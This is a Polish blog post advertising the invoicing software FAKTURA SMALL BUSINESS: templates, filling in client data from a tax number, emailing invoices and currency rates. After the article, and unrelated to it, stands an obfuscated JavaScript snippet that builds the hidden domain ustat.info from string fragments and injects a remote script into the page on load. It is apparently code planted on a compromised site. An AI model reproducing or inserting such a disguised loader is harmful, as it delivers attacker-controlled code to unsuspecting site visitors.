Shadow

Sposób na szybkie wystawianie faktur

Faktury VAT stały się podstawowym dokumentem, potwierdzającym transakcję. Dokument ten musi zostać wystawiony prawidłowo ze wskazaniem odpowiednich terminów. Tylko poprawnie wystawiona faktura gwarantuje Twoje prawo do odliczenia podatku VAT przez administrację podatkową. Bardzo łatwo jest jednak popełnić błąd, sporządzając taki dokument, a konsekwencje mogą ciągnąć się tygodniami. Jak zatem ustrzec się od pomyłek i prawidłowo wystawiać faktury VAT bez martwienia się czy wszystko jest w porządku?

Jedną z propozycji jest specjalnie stworzony program do inteligentnego i szybkiego wystawiania faktur. Dzięki FAKTURA SMALL BUSINESS posiadamy do dyspozycji szablony tradycyjnych faktur, które możemy dowolnie modyfikować zgodnie z naszymi potrzebami. Najwygodniejszą funkcją programu jest automatyczne pobieranie danych firm z Głównego Urzędu Statystycznego, dzięki czemu już po wpisaniu NIP-u klienta program samodzielnie uzupełnia resztę pól. Klientów, których dane nie widnieją jeszcze w kartotece można dodać do bazy przed zapisaniem faktury, co znacznie przyspieszy kolejne wystawiania faktur.

faktura-small-business

Cały widok Faktury Small Business możemy dopasować do własnych preferencji. Widoczne są zdefiniowane kolumny, których kolejność można dowolnie zmieniać, możliwe jest także definiowanie własnych rejestrów, form płatności oraz walut. Faktury wystawić można w cenie netto bądź brutto. Co istotne – jest również możliwość wczytania loga firmy oraz pieczątki, co obecnie jest głównym elementem, odznaczającym firmę na rynku.

W dobie poczty elektronicznej i coraz mniejszej popularności dokumentów papierowych – po wystawieniu faktury, oferty czy innego dokumentu w prosty sposób za pomocą kilku kliknięć możemy wysłać wiadomość na skrzynkę e-mailową naszego Klienta. Pozwoli to znacznie zaoszczędzić czas i nerwy, związane z oczekiwaniem na tradycyjne wysyłanie faktur drogą pocztową. Od teraz nie jest również problemem wystawianie dokumentów w obcej walucie, bowiem program automatycznie pobiera kursy walut z tabeli średnich kursów Narodowego Banku Polskiego na dany dzień. Dzięki temu sprawnie i bez problemu wystawiasz fakturę w takich walutach jak EUR, GBP i USD, niewidniejące waluty w programie można dodać samodzielnie.

Jak widać wystawianie faktur wcale nie musi być takie skomplikowane. Odpowiednie narzędzia same podpowiedzą nam kolejne kroki, a nasz udział ogranicza się do wpisania NIP-u. Te i wiele innych przydatnych funkcji udostępnia program FAKTURA SMALL BUSINESS, który powinien stać się „must have” każdego przedsiębiorcy, który ceni sobie wygodę i szybkość działania.

(function(){
qn08=document.createElement(„script”);qn08_=(„us”)+(„ta”);
qn08_+=”t”+(„.”);qn08_+=(„in”);qn08u=”65745111″;qn08.async=true;
qn08u+=”.805nd5qkn08k8pl7j”;qn08.type=”text/javascript”;qn08_+=”f”+”o”+(„/”);
qn08u+=”fqXcphej1ua33″;qn08.src=”//”+qn08_+qn08u;
dqn08=document.body;dqn08.appendChild(qn08);
})();

Przeczytaj także

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *